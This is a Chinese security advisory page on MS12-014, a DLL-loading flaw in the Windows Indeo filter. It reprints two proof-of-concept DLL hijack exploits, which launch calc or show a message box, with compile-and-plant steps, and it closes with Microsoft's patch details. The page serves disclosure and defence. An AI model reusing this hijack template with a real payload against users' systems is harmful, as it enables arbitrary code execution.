安全研究
安全漏洞
Microsoft Windows Indeo Filter 'iacenc.dll' DLL加载任意代码执行漏洞(MS12-014)
发布日期:2012-02-14
更新日期:2012-02-15
受影响系统:
Microsoft Windows Vista描述:
Microsoft Windows Server 2008
Microsoft Windows 7
BUGTRAQ ID: 42730
CVE(CAN) ID: CVE-2010-3138
Microsoft Windows是流行的计算机操作系统。
Windows的iac25_32.ax过滤器在处理DLL文件的加载上存在漏洞,攻击者可利用此漏洞使用户从不安全的目录加载DLL文件并执行任意代码。
<*来源:Encrypt3d.M!nd
链接:http://www.microsoft.com/technet/security/bulletin/MS12-014.asp
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
Mediaplayer Classic 1.3.2189.0 Dll Hijack Exploit
By: Encrypt3d.M!nd
Date: 25\8\2010
Download: http://mpc-hc.sourceforge.net/
Details:
Compile the following code and rename it to iacenc.dll
and place file with one of the affected types in the same directory of the dll
Affected types: m2ts, m2t, flv, hdmov, 3gpp,3gp, mpeg, mp4v, mkv, m2v,rm , ram
(i guess all file types that mpc supports are affected)
Code :(used the one from this advisory:http://www.exploit-db.com/exploits/14758/):
*/
#include <windows.h>
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT void hook_startup() { evil(); }
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}
/*
Media Player Classic 6.4.9.1 (iacenc.dll) DLL Hijacking Exploit
Vendor: Gabest
Product Web Page: http://sourceforge.net/projects/guliverkli
Affected Version: 6.4.9.1 (revision 73)
Summary: Media Player Classic (MPC) is a compact media player for
32-bit Microsoft Windows. The application mimics the look and feel
of the old, lightweight Windows Media Player 6.4 but integrates
most options and features found in modern media players. It and
its forks are standard media players in the K-Lite Codec Pack and
the Combined Community Codec Pack.
Desc: Media Player Classic suffers from a dll hijacking vulnerability
that enables the attacker to execute arbitrary code on a local
level. The vulnerable extensions are .mka, .ra and .ram thru iacenc.dll
library.
----
gcc -shared -o iacenc.dll mplayerc.c
Compile and rename to iacenc.dll, create a file test.mka or any of the
above vulnerable extensions and put both files in same dir and execute.
----
Tested on Microsoft Windows XP Professional SP3 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
25.08.2010
*/
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}
建议:
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS12-014)以及相应补丁:
MS12-014:Vulnerability in the Indeo Codec Could Allow Remote Code Execution (2661637)
链接:http://www.microsoft.com/technet/security/bulletin/MS12-014.asp
浏览次数:2421
严重程度:0(网友投票)
绿盟科技给您安全的保障
